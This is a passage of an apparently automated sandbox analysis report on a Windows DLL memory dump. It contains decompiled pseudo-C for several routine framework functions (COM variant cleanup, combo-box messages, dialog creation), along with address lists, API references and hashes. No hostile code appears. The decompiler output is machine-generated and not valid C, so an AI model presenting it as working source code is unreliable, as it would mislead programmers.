											 *((intOrPtr*)(__edi + 8)) = __ebx;
											goto L52;
										case 2:
											 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__ebp - 0x44));
											goto L52;
										case 3:
											 *((long long*)(__edi + 8)) =  *((long long*)(__ebp - 0x44));
											goto L52;
										case 4:
											__eax =  *((intOrPtr*)(__ebp - 0x44));
											 *((intOrPtr*)(__edi + 8)) =  *((intOrPtr*)(__ebp - 0x44));
											__eax =  *((intOrPtr*)(__ebp - 0x40));
											 *((intOrPtr*)(__edi + 0xc)) =  *((intOrPtr*)(__ebp - 0x40));
											goto L52;
										case 5:
											__eax = 0;
											__eflags = __bx;
											0 | __eflags == 0x00000000 = (0 | __eflags == 0x00000000) - 1;
											 *((short*)(__edi + 8)) = __ax;
											goto L52;
										case 6:
											__esi = __ebp - 0x44;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t187[4] = _t176;
											goto L52;
									}
								}
								 *(_t196 - 4) = 0;
								E1003D57A(_t182);
								 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
								__eflags =  *(_t196 - 0x28);
								if( *(_t196 - 0x28) != 0) {
									_push( *((intOrPtr*)(_t196 - 0x2c)));
									_push(0);
									E1001E961();
								}
								goto L55;
							}
							_t188 =  *(_t196 - 0x30);
							do {
								__imp__#9(_t188);
								_t160 =  *(_t196 + 0x14);
								_t192 = _t192 + 1;
								_t188 =  &(_t188[0x10]);
								__eflags = _t192 -  *((intOrPtr*)(_t160 + 8));
							} while (_t192 <  *((intOrPtr*)(_t160 + 8)));
							goto L29;
						}
						_t161 =  *(_t196 - 0x24) & 0x0000ffff;
						_push(_t187);
						_push(_t194);
						_push( *(_t196 - 0x20));
						 *(_t196 - 4) = 2;
						__eflags = _t161 - 4;
						if(_t161 == 4) {
							E1003F0E3();
							 *((intOrPtr*)(_t196 - 0x34)) = _t205;
							 *((intOrPtr*)(_t196 - 0x44)) =  *((intOrPtr*)(_t196 - 0x34));
							L25:
							 *(_t196 - 4) = 1;
							goto L26;
						}
						__eflags = _t161 - 5;
						if(_t161 == 5) {
							L23:
							E1003F0E3();
							 *((long long*)(_t196 - 0x44)) = _t205;
							goto L25;
						}
						__eflags = _t161 - 7;
						if(_t161 == 7) {
							goto L23;
						}
						__eflags = _t161 + 0xffffffec - 1;
						if(_t161 + 0xffffffec > 1) {
							_t176 = E1003F0E3();
						} else {
							 *((intOrPtr*)(_t196 - 0x44)) = E1003F0E3();
							 *((intOrPtr*)(_t196 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
					__eflags =  *(_t196 - 0x28) - _t187;
					if( *(_t196 - 0x28) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t196 - 0x2c)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t191 + 3; // 0x3
				_t187 = _t19;
				if(E10003A10(_t185, _t19) != 0) {
					E100421D0(_t187);
					 *(_t196 - 0x10) = _t197;
					_t189 = _t197;
					_t26 = _t191 + 3; // 0x3
					E10003B00(_t189, _t191, _t189, _t26,  *(_t196 - 0x18), _t191);
					_t172 = _t176[0xc] & 0x0000ffff;
					_t197 =  &(_t197[0x10]);
					 *(_t196 - 0x18) = _t189;
					__eflags = _t172 - 8;
					if(_t172 == 8) {
						_t172 = 0xe;
					}
					 *(_t196 - 0x24) =  *(_t196 - 0x24) & 0x00000000;
					_t189[_t191] = 0xff;
					_t195 = _t191 + 1;
					_t189[_t195] = _t172;
					_t189[_t195 + 1] = 0;
					 *(_t196 - 0x20) = _t176[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}

0x1003e624
0x1003e624
0x1003e624
0x1003e62b
0x1003e630
0x1003e639
0x1003e63e
0x1003e641
0x1003e644
0x1003e646
0x1003e649
0x1003e64d
0x1003e652
0x1003e657
0x1003e657
0x1003e667
0x1003e66c
0x1003e673
0x1003e676
0x1003e6ea
0x1003e6ea
0x1003e6f4
0x1003e6f9
0x1003e6fa
0x1003e6fc
0x1003e70d
0x1003e710
0x1003e716
0x00000000
0x00000000
0x1003e718
0x1003e71d
0x1003e722
0x1003e725
0x1003e72d
0x1003e732
0x1003e740
0x1003e742
0x1003e742
0x1003e746
0x1003e74c
0x1003e74e
0x1003e686
0x1003e686
0x1003e68e
0x1003e69a
0x1003e930
0x1003e938
0x1003e938
0x1003e690
0x1003e693
0x1003e695
0x1003e695
0x00000000
0x1003e695
0x1003e756
0x1003e75b
0x1003e75e
0x1003e760
0x1003e762
0x1003e769
0x1003e76c
0x1003e76f
0x1003e772
0x1003e77b
0x1003e77c
0x1003e782
0x1003e785
0x1003e789
0x1003e78c
0x1003e78f
0x1003e790
0x1003e793
0x1003e794
0x1003e799
0x1003e79c
0x1003e79e
0x1003e7f9
0x1003e7f9
0x1003e7fc
0x1003e7fe
0x1003e801
0x1003e819
0x1003e819
0x1003e81d
0x1003e820
0x1003e86d
0x1003e872
0x1003e875
0x1003e877
0x1003e8df
0x1003e8df
0x1003e8e2
0x1003e908
0x1003e90e
0x1003e911
0x1003e915
0x1003e91a
0x1003e91e
0x1003e922
0x1003e924
0x1003e927
0x1003e929
0x1003e929
0x1003e92e
0x00000000
0x1003e92e
0x1003e8e4
0x1003e8e4
0x1003e8e5
0x1003e8ef
0x1003e8ef
0x1003e8f1
0x1003e8f6
0x1003e8f6
0x00000000
0x1003e8f1
0x1003e8e7
0x1003e8e7
0x1003e8ea
0x1003e8ff
0x00000000
0x1003e8ff
0x1003e8ec
0x1003e8ed
0x00000000
0x00000000
0x00000000
0x1003e8ed
0x1003e879
0x1003e87c
0x1003e882
0x1003e885
0x1003e888
0x00000000
0x00000000
0x1003e88e
0x00000000
0x1003e89a
0x00000000
0x00000000
0x1003e8d6
0x00000000
0x00000000
0x1003e8b1
0x00000000
0x00000000
0x1003e8b9
0x00000000
0x00000000
0x1003e8a0
0x1003e8a3
0x1003e8a6
0x1003e8a9
0x00000000
0x00000000
0x1003e8be
0x1003e8c0
0x1003e8c6
0x1003e8c7
0x00000000
0x00000000
0x1003e8cd
0x1003e8d0
0x1003e8d1
0x1003e8d2
0x1003e8d3
0x00000000
0x00000000
0x00000000
0x00000000
0x1003e895
0x00000000
0x00000000
0x1003e88e
0x1003e822
0x1003e826
0x1003e82b
0x1003e82f
0x1003e833
0x1003e835
0x1003e838
0x1003e83a
0x1003e83a
0x00000000
0x1003e83f
0x1003e803
0x1003e806
0x1003e807
0x1003e80d
0x1003e810
0x1003e811
0x1003e814
0x1003e814
0x00000000
0x1003e806
0x1003e7a0
0x1003e7a4
0x1003e7a5
0x1003e7a6
0x1003e7a9
0x1003e7ad
0x1003e7b0
0x1003e7e4
0x1003e7e9
0x1003e7ef
0x1003e7f2
0x1003e7f2
0x00000000
0x1003e7f2
0x1003e7b2
0x1003e7b5
0x1003e7da
0x1003e7da
0x1003e7df
0x00000000
0x1003e7df
0x1003e7b7
0x1003e7ba
0x00000000
0x00000000
0x1003e7bf
0x1003e7c2
0x1003e7d6
0x1003e7c4
0x1003e7c9
0x1003e7cc
0x1003e7cc
0x00000000
0x1003e7c2
0x1003e6fe
0x1003e6fe
0x1003e702
0x1003e705
0x00000000
0x00000000
0x1003e707
0x1003e70a
0x00000000
0x1003e70a
0x1003e678
0x1003e678
0x1003e684
0x1003e6a6
0x1003e6ab
0x1003e6ae
0x1003e6b4
0x1003e6b9
0x1003e6be
0x1003e6c2
0x1003e6c5
0x1003e6c8
0x1003e6cc
0x1003e6d0
0x1003e6d0
0x1003e6d1
0x1003e6d5
0x1003e6d9
0x1003e6da
0x1003e6dd
0x1003e6e5
0x1003e6e8
0x1003e6e8
0x00000000
0x1003e6e8
0x00000000

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 1003E62B
lstrlenA.KERNEL32(00000000,000000FF,00000050,10037351,00000000,00000001,?,?,000000FF,?,?,?,?,?,?,00000034), ref: 1003E65D

Part of subcall function 10003B00: _memcpy_s.LIBCMT ref: 10003B16

_memset.LIBCMT ref: 1003E72D
VariantClear.OLEAUT32(?), ref: 1003E807

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
String ID:
API String ID: 4021759052-0
Opcode ID: dfd944334680a8bd27c3803902eeba6bb823f7ac9c3200392286d33333c57e5d
Instruction ID: 9ba4cb1d1c92bb7a0b2ed34e6bf879c81fe9ed785d12b41a795d65ce97c054d0
Opcode Fuzzy Hash: dfd944334680a8bd27c3803902eeba6bb823f7ac9c3200392286d33333c57e5d
Instruction Fuzzy Hash: 0AA19E35D0069ADFCF12CFA8C88569EBBB0FF04351F20421AE855BB291C730AE51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10030A71, Relevance: 9.2, APIs: 6, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E10030A71(void* __ebx, intOrPtr __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t99;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t141;
				intOrPtr* _t147;
				void* _t156;
				intOrPtr _t158;
				intOrPtr* _t159;
				void* _t160;
				intOrPtr _t172;

				_t155 = __edi;
				_push(0x10);
				E10041CAB(0x100537f7, __ebx, __edi, __esi);
				_t158 = __ecx;
				 *((intOrPtr*)(_t160 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1005bb34;
				 *(_t160 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t158 + 0x24)) != 0) {
						_t155 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x1c)) + 8));
						__eflags = _t155;
						if(_t155 == 0) {
							break;
						}
						_t147 =  *_t155;
						__eflags = _t147;
						if(_t147 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t147 + 0xbc))( *((intOrPtr*)(_t155 + 8)), 0);
						 *((intOrPtr*)( *_t155 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t160 - 0x18)) = _t158 + 0x18;
					E10029E75(_t158 + 0x18);
					if( *((intOrPtr*)(_t158 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t158 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t158 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t158 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t158 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t134 =  *((intOrPtr*)(_t158 + 0x54));
							if( *((intOrPtr*)(_t158 + 0x54)) != 0) {
								E1002F2C8(_t134,  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x50)))));
								E1002B49F( *((intOrPtr*)(_t158 + 0x54)));
							}
							_t135 =  *((intOrPtr*)(_t158 + 0x54));
							_t184 =  *((intOrPtr*)(_t158 + 0x54));
							if( *((intOrPtr*)(_t158 + 0x54)) != 0) {
								E1002F2A7(0, _t135, _t155, _t184, 1);
							}
							_t136 =  *((intOrPtr*)(_t158 + 0x50));
							_t185 =  *((intOrPtr*)(_t158 + 0x50));
							if( *((intOrPtr*)(_t158 + 0x50)) != 0) {
								E100309AC(0, _t136, _t155, _t185, 1);
							}
							_t86 =  *((intOrPtr*)(_t158 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t159 =  *((intOrPtr*)(_t158 + 0x48));
							if(_t159 != 0) {
								 *((intOrPtr*)( *_t159 + 8))(_t159);
							}
							 *(_t160 - 4) =  *(_t160 - 4) | 0xffffffff;
							return E10041D83(E10029F85( *((intOrPtr*)(_t160 - 0x18))));
						} else {
							 *((intOrPtr*)(_t160 - 0x10)) = 0;
							if( *((intOrPtr*)(_t158 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t158 + 0x14)));
								goto L32;
							}
							_t156 = 0;
							do {
								_t99 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x14)) + _t156 + 0x24)) + 4));
								 *((intOrPtr*)(_t160 - 0x14)) = _t99;
								if(_t99 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E1000CCA9(_t160 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t160 - 0x14)) != 0);
								L28:
								E10029E75( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x14)) + _t156 + 0x24)));
								_t141 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x14)) + _t156 + 0x24));
								if(_t141 != 0) {
									 *((intOrPtr*)( *_t141 + 4))(1);
								}
								 *((intOrPtr*)(_t160 - 0x10)) =  *((intOrPtr*)(_t160 - 0x10)) + 1;
								_t156 = _t156 + 0x28;
							} while ( *((intOrPtr*)(_t160 - 0x10)) <  *((intOrPtr*)(_t158 + 0x10)));
							goto L31;
						}
					}
					_t155 = 0;
					if( *((intOrPtr*)(_t158 + 0x38)) <= 0) {
						L17:
						if(_t172 != 0) {
							E1000932A(0, _t155, _t158, _t172,  *((intOrPtr*)(_t158 + 0x3c)));
							E1000932A(0, _t155, _t158, _t172,  *((intOrPtr*)(_t158 + 0x40)));
						}
						goto L19;
					}
					 *((intOrPtr*)(_t160 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t158 + 0x40)) +  *((intOrPtr*)(_t160 - 0x10)));
						 *((intOrPtr*)(_t160 - 0x10)) =  *((intOrPtr*)(_t160 - 0x10)) + 0x10;
						_t155 = _t155 + 1;
					} while (_t155 <  *((intOrPtr*)(_t158 + 0x38)));
					_t172 =  *((intOrPtr*)(_t158 + 0x38));
					goto L17;
				}
				_t119 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t119 == 0) {
					goto L11;
				}
				_t120 =  *_t119;
				_push(_t160 - 0x14);
				_push(0x1005f644);
				_push(_t120);
				if( *((intOrPtr*)( *_t120))() < 0) {
					goto L11;
				}
				_t122 =  *((intOrPtr*)(_t160 - 0x14));
				if(_t122 == 0) {
					goto L11;
				}
				_push(_t160 - 0x10);
				_push(0x1005f864);
				 *((intOrPtr*)(_t160 - 0x10)) = 0;
				_push(_t122);
				if( *((intOrPtr*)( *_t122 + 0x10))() >= 0) {
					_t126 =  *((intOrPtr*)(_t160 - 0x10));
					if(_t126 != 0) {
						 *((intOrPtr*)( *_t126 + 0x18))(_t126,  *((intOrPtr*)(__ecx + 0x58)));
						_t128 =  *((intOrPtr*)(_t160 - 0x10));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
					}
				}
				_t124 =  *((intOrPtr*)(_t160 - 0x14));
				 *((intOrPtr*)( *_t124 + 8))(_t124);
				goto L11;
			}

0x10030a71
0x10030a71
0x10030a78
0x10030a7d
0x10030a7f
0x10030a82
0x10030a8a
0x10030a90
0x00000000
0x10030b16
0x10030af5
0x10030af8
0x10030afa
0x00000000
0x00000000
0x10030afc
0x10030afe
0x10030b00
0x00000000
0x00000000
0x10030b08
0x10030b10
0x10030b10
0x10030b1e
0x10030b21
0x10030b29
0x10030b63
0x10030b63
0x10030b68
0x10030b6d
0x10030b6d
0x10030b70
0x10030b75
0x10030b7a
0x10030b7a
0x10030b80
0x10030bef
0x10030bef
0x10030bf4
0x10030bf7
0x10030bf7
0x10030bfd
0x10030c02
0x10030c09
0x10030c11
0x10030c11
0x10030c16
0x10030c19
0x10030c1b
0x10030c1f
0x10030c1f
0x10030c24
0x10030c27
0x10030c29
0x10030c2d
0x10030c2d
0x10030c32
0x10030c37
0x10030c3c
0x10030c3c
0x10030c3f
0x10030c44
0x10030c49
0x10030c49
0x10030c4f
0x10030c5d
0x10030b82
0x10030b85
0x10030b88
0x10030be6
0x10030be9
0x00000000
0x10030be9
0x10030b8a
0x10030b8c
0x10030b93
0x10030b96
0x10030b9b
0x00000000
0x00000000
0x00000000
0x00000000
0x10030b9d
0x10030b9d
0x10030baf
0x10030bb5
0x10030bba
0x10030bc1
0x10030bc9
0x10030bcf
0x10030bd5
0x10030bd5
0x10030bd8
0x10030bde
0x10030be1
0x00000000
0x10030b8c
0x10030b80
0x10030b2b
0x10030b30
0x10030b4f
0x10030b4f
0x10030b54
0x10030b5c
0x10030b62
0x00000000
0x10030b4f
0x10030b32
0x10030b35
0x10030b3c
0x10030b42
0x10030b46
0x10030b47
0x10030b4c
0x00000000
0x10030b4c
0x10030a96
0x10030a9b
0x00000000
0x00000000
0x10030a9d
0x10030aa4
0x10030aa5
0x10030aaa
0x10030aaf
0x00000000
0x00000000
0x10030ab1
0x10030ab6
0x00000000
0x00000000
0x10030abb
0x10030abc
0x10030ac1
0x10030ac6
0x10030acc
0x10030ace
0x10030ad3
0x10030adb
0x10030ade
0x10030ae4
0x10030ae4
0x10030ad3
0x10030ae7
0x10030aed
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10030A78
VariantClear.OLEAUT32(?), ref: 10030B3C
CoTaskMemFree.OLE32(?,00000010,10030C6B,?,?,100314CE,00000001,0000000C,10016F5A), ref: 10030BE9
CoTaskMemFree.OLE32(?,00000010,10030C6B,?,?,100314CE,00000001,0000000C,10016F5A), ref: 10030BF7
ctype.LIBCPMT ref: 10030C1F
ctype.LIBCPMT ref: 10030C2D

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeTaskctype$ClearH_prolog3Variant
String ID:
API String ID: 151822039-0
Opcode ID: dbc55ec9efca0dd78fdbae2d1524671d8f7c6200ecdb639ef0c1fcf55dc63b47
Instruction ID: 7d2317b95ff1fd698e8e74a000254b10577137136295c52623c48e6195c61406
Opcode Fuzzy Hash: dbc55ec9efca0dd78fdbae2d1524671d8f7c6200ecdb639ef0c1fcf55dc63b47
Instruction Fuzzy Hash: 2F712475A01646CFCB55CFA4C9E496AB3F2FF48345B51096CF1469B661CB31EC84CB10

Uniqueness

Uniqueness Score: -1.00%

Function 100061C0, Relevance: 9.2, APIs: 6, Instructions: 150
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100061C0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				char _v16;
				intOrPtr _v20;
				long _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				short _v44;
				char _v48;
				long _v52;
				void* _v56;
				intOrPtr _v60;
				long _v76;
				intOrPtr _v96;
				signed int _t61;
				void* _t81;
				signed int _t88;
				signed int _t135;
				void* _t138;

				_t138 = __eflags;
				_push(0xffffffff);
				_push(0x100549f0);
				_push( *[fs:0x0]);
				_t61 =  *0x1006d940; // 0xc2bf211
				_push(_t61 ^ _t135);
				 *[fs:0x0] =  &_v16;
				_v96 = __ecx;
				E100016F0( &_v40, E10009A54());
				_v8 = 0;
				E100016F0( &_v32, E10009A54());
				_v8 = 1;
				_v20 = E1000F66E(_v96);
				_v36 = E10008600(_v20);
				E100100A1(_v36,  &_v32);
				E10007950(__ebx, _v96 + 0xf4, __edi, __esi, _t138, 0x12,  &_v40, 3, 0);
				if(SendMessageA( *(_v36 + 0x20), 0x157, 0, 0) == 0) {
					_v48 = _v40;
					_t88 = E10007780( &_v32, _v48);
					asm("sbb eax, eax");
					if(( ~( ~_t88) & 0x000000ff) != 0) {
						_v52 = _v40;
						_v24 = SendMessageA( *(_v36 + 0x20), 0x14c, 0, _v52);
						if(_v24 != 0xffffffff) {
							SendMessageA( *(_v36 + 0x20), 0x14e, _v24, 0);
						}
					}
				}
				_v36 = E10008620(_v20);
				_v28 = 0;
				_v44 = 0;
				_v60 = E10007D70(_v96 + 0xf4, 0x13,  &_v56, 1, 0);
				if(_v60 == 0) {
					_v28 = _v56;
				}
				if(SendMessageA( *(_v36 + 0x20), 0x157, 0, 0) == 0) {
					E10002800( &_v40);
					_v76 = _v40;
					_v24 = SendMessageA( *(_v36 + 0x20), 0x14c, 0, _v76);
					E100071C0( &_v40, 0xffffffff);
					if(_v24 != 0xffffffff) {
						SendMessageA( *(_v36 + 0x20), 0x14e, _v24, 0);
					}
				}
				_v8 = 0;
				E10001740( &_v32);
				_v8 = 0xffffffff;
				_t81 = E10001740( &_v40);
				 *[fs:0x0] = _v16;
				return _t81;
			}

0x100061c0
0x100061c3
0x100061c5
0x100061d0
0x100061d4
0x100061db
0x100061df
0x100061e5
0x100061f1
0x100061f6
0x10006206
0x1000620b
0x10006217
0x10006222
0x1000622c
0x10006244
0x10006261
0x10006266
0x10006270
0x10006277
0x10006280
0x10006285
0x100062a0
0x100062a7
0x100062bb
0x100062bb
0x100062a7
0x10006280
0x100062c9
0x100062ce
0x100062d4
0x100062f0
0x100062f7
0x100062fd
0x100062fd
0x10006319
0x1000631e
0x10006326
0x10006341
0x10006349
0x10006352
0x10006366
0x10006366
0x10006352
0x1000636c
0x10006373
0x10006378
0x10006382
0x1000638a
0x10006395

APIs

Part of subcall function 100100A1: GetWindowTextLengthA.USER32(?), ref: 100100B2
Part of subcall function 100100A1: GetWindowTextA.USER32 ref: 100100C9

Part of subcall function 10007950: VariantInit.OLEAUT32(000000FF), ref: 1000798C

SendMessageA.USER32(?,00000157,00000000,00000000), ref: 10006259
SendMessageA.USER32(?,0000014C,00000000,?), ref: 1000629A
SendMessageA.USER32(?,0000014E,000000FF,00000000), ref: 100062BB
SendMessageA.USER32(?,00000157,00000000,00000000), ref: 10006311
SendMessageA.USER32(?,0000014C,00000000,?), ref: 1000633B
SendMessageA.USER32(?,0000014E,000000FF,00000000), ref: 10006366

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$TextWindow$InitLengthVariant
String ID:
API String ID: 1008326902-0
Opcode ID: 309df0cbbaf2d7b8ead9bec0bc1ce3a094b2e2e2e6225b44a5960a3532aeeffe
Instruction ID: 477d978c5826edd432ce6e5043094fb34aa6f1d2c3b320096b012a9c94fd5b39
Opcode Fuzzy Hash: 309df0cbbaf2d7b8ead9bec0bc1ce3a094b2e2e2e6225b44a5960a3532aeeffe
Instruction Fuzzy Hash: 1F512774A40209ABEB04CBA4DC82FEEB7B5FF48750F204218F515BB2D5EB75A905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10016409, Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10016409(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t60;
				signed int _t65;
				signed int _t68;
				struct HWND__* _t69;
				signed int _t72;
				signed int _t102;
				signed int _t115;
				DLGTEMPLATE* _t116;
				struct HWND__* _t117;
				intOrPtr* _t119;
				void* _t120;

				_t114 = __edi;
				_t96 = __ecx;
				_push(0x3c);
				E10041CDE(0x100522da, __ebx, __edi, __esi);
				_t119 = __ecx;
				 *((intOrPtr*)(_t120 - 0x20)) = __ecx;
				_t124 =  *(_t120 + 0x10);
				if( *(_t120 + 0x10) == 0) {
					 *(_t120 + 0x10) =  *(E1001F108(0, __edi, __ecx, _t124) + 0xc);
				}
				_t115 =  *(E1001F108(0, _t114, _t119, _t124) + 0x3c);
				 *(_t120 - 0x28) = _t115;
				 *(_t120 - 0x14) = 0;
				 *(_t120 - 4) = 0;
				E10011D0D(0, _t96, _t115, _t119, _t124, 0x10);
				E10011D0D(0, _t96, _t115, _t119, _t124, 0x3c000);
				if(_t115 == 0) {
					_t116 =  *(_t120 + 8);
					L7:
					__eflags = _t116;
					if(_t116 == 0) {
						L4:
						_t60 = 0;
						L26:
						return E10041D83(_t60);
					}
					E10001670(_t120 - 0x1c);
					 *(_t120 - 4) = 1;
					 *((intOrPtr*)(_t120 - 0x18)) = 0;
					_t65 = E1002B161(__eflags, _t116, _t120 - 0x1c, _t120 - 0x18);
					__eflags = _t65;
					__eflags = 0 | _t65 == 0x00000000;
					if(__eflags != 0) {
						_push(_t116);
						E1002B125(0, _t120 - 0x38, _t116);
						 *(_t120 - 4) = 2;
						E1002B081(_t120 - 0x38,  *((intOrPtr*)(_t120 - 0x18)));
						 *(_t120 - 0x14) = E1002AD8E(_t120 - 0x38);
						 *(_t120 - 4) = 1;
						E1002AD80(_t120 - 0x38);
						__eflags =  *(_t120 - 0x14);
						if(__eflags != 0) {
							_t116 = GlobalLock( *(_t120 - 0x14));
						}
					}
					 *(_t119 + 0x44) =  *(_t119 + 0x44) | 0xffffffff;
					 *(_t119 + 0x3c) =  *(_t119 + 0x3c) | 0x00000010;
					E10010C84(__eflags, _t119);
					_t68 =  *(_t120 + 0xc);
					__eflags = _t68;
					if(_t68 != 0) {
						_t69 =  *(_t68 + 0x20);
					} else {
						_t69 = 0;
					}
					_t117 = CreateDialogIndirectParamA( *(_t120 + 0x10), _t116, _t69, E10015E2B, 0);
					E10001020( *((intOrPtr*)(_t120 - 0x1c)) + 0xfffffff0);
					 *(_t120 - 4) =  *(_t120 - 4) | 0xffffffff;
					_t102 =  *(_t120 - 0x28);
					__eflags = _t102;
					if(__eflags != 0) {
						__eflags = _t117;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t102 + 0x18))(_t120 - 0x48);
							 *((intOrPtr*)( *_t119 + 0x134))(0);
						}
					}
					_t72 = E1000ECA2(__eflags);
					__eflags = _t72;
					if(_t72 == 0) {
						 *((intOrPtr*)( *_t119 + 0x11c))();
					}
					__eflags = _t117;
					if(_t117 != 0) {
						__eflags =  *(_t119 + 0x3c) & 0x00000010;
						if(( *(_t119 + 0x3c) & 0x00000010) == 0) {
							DestroyWindow(_t117);
							_t117 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t120 - 0x14);
					if( *(_t120 - 0x14) != 0) {
						GlobalUnlock( *(_t120 - 0x14));
						GlobalFree( *(_t120 - 0x14));
					}
					__eflags = _t117;
					_t54 = _t117 != 0;
					__eflags = _t54;
					_t60 = 0 | _t54;
					goto L26;
				}
				_push(_t120 - 0x48);
				if( *((intOrPtr*)( *_t119 + 0x134))() != 0) {
					_t116 =  *((intOrPtr*)( *_t115 + 0x14))(_t120 - 0x48,  *(_t120 + 8));
					goto L7;
				}
				goto L4;
			}

0x10016409
0x10016409
0x10016409
0x10016410
0x10016415
0x10016417
0x1001641c
0x1001641f
0x10016429
0x10016429
0x10016431
0x10016436
0x10016439
0x1001643c
0x1001643f
0x10016449
0x10016450
0x1001647d
0x10016480
0x10016480
0x10016482
0x10016464
0x10016464
0x100165b7
0x100165bc
0x100165bc
0x10016487
0x10016495
0x10016499
0x1001649c
0x100164a6
0x100164ad
0x100164af
0x100164b1
0x100164b5
0x100164c0
0x100164c4
0x100164d4
0x100164d7
0x100164db
0x100164e0
0x100164e3
0x100164ee
0x100164ee
0x100164e3
0x100164f0
0x100164f4
0x100164f9
0x100164fe
0x10016501
0x10016503
0x10016509
0x10016505
0x10016505
0x10016505
0x10016523
0x10016525
0x1001652a
0x10016554
0x10016557
0x10016559
0x1001655b
0x1001655d
0x10016565
0x1001656d
0x1001656d
0x1001655d
0x10016573
0x10016578
0x1001657a
0x10016580
0x10016580
0x10016586
0x10016588
0x1001658a
0x1001658e
0x10016591
0x10016597
0x10016597
0x10016597
0x1001658e
0x10016599
0x1001659c
0x100165a1
0x100165aa
0x100165aa
0x100165b2
0x100165b4
0x100165b4
0x100165b4
0x00000000
0x100165b4
0x10016457
0x10016462
0x10016479
0x00000000
0x10016479
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 10016410
